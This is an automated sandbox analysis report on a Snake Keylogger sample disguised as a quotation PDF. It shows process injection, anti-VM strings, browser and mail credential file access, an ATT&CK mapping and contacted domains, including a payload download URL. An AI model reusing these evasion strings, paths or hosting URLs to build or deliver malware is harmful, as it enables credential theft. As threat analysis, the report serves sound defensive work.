Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95859	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95749	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95640	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95531	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95421	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95312	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95202	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 95093	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94984	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94874	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94765	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94546	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Thread delayed: delay time: 94437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware\|VIRTUAL\|A M I\|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft\|VMWare\|VirtualXjohnYannaZxxxxxxxx
Source: aspnet_compiler.exe, 00000005.00000002.2535653766.000001E56C3CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1923724207.00000210C03A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 6C220000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1E56C220000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2532886992.000001E500245000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2532886992.000001E500245000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_NOVQTRA071244PDF.scr.exe	19%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
http://www.zzzprojects.com	0%	Avira URL Cloud	safe
https://dapper-plus.net/getting-started-mapping#instance-context-mapping.	0%	Avira URL Cloud	safe
https://dapper-plus.net/pricing.	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/include-graph).	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/md5-exception	0%	Avira URL Cloud	safe
https://bulk-operations.net/pricing.	0%	Avira URL Cloud	safe
https://s23.filetransfer.io/storage/download/mOA1FV1QAe83	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/)	0%	Avira URL Cloud	safe
https://bulk-operations.net	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/pricing.	0%	Avira URL Cloud	safe
https://dapper-plus.net/getting-started-mapping#instance-context-mapping	0%	Avira URL Cloud	safe
http://entityframework-plus.net/	0%	Avira URL Cloud	safe
https://linqtosql-plus.net/pricing.	0%	Avira URL Cloud	safe
https://dapper-plus.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
filetransfer.io	188.114.96.3	true	false	high
reallyfreegeoip.org	188.114.97.3	true	false	high
s23.filetransfer.io	188.114.96.3	true	false	unknown
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s23.filetransfer.io/storage/download/mOA1FV1QAe83	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high
https://filetransfer.io/data-package/Bh1Kj4RD/download	false		high
http://filetransfer.io/data-package/Bh1Kj4RD/download	false		high
https://reallyfreegeoip.org/xml/155.94.241.187	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://entityframework-extensions.net/md5-exception	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bulk-operations.net	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://dapper-plus.net/getting-started-mapping#instance-context-mapping.	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://dapper-plus.net/pricing.	QUOTATION_NOVQTRA071244PDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://entityframework-extensions.net/)	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001FE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5000FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50015A000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zzzprojects.com	QUOTATION_NOVQTRA071244PDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://bulk-operations.net/pricing.	QUOTATION_NOVQTRA071244PDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://s23.filetransfer.io	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://entityframework-extensions.net/include-graph).	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://entityframework-extensions.net/pricing.	QUOTATION_NOVQTRA071244PDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://dapper-plus.net/getting-started-mapping#instance-context-mapping	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://linqtosql-plus.net/pricing.	QUOTATION_NOVQTRA071244PDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/155.94.241.187p	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	false		high
http://entityframework-plus.net/	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50012C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://filetransfer.io	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50015A000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
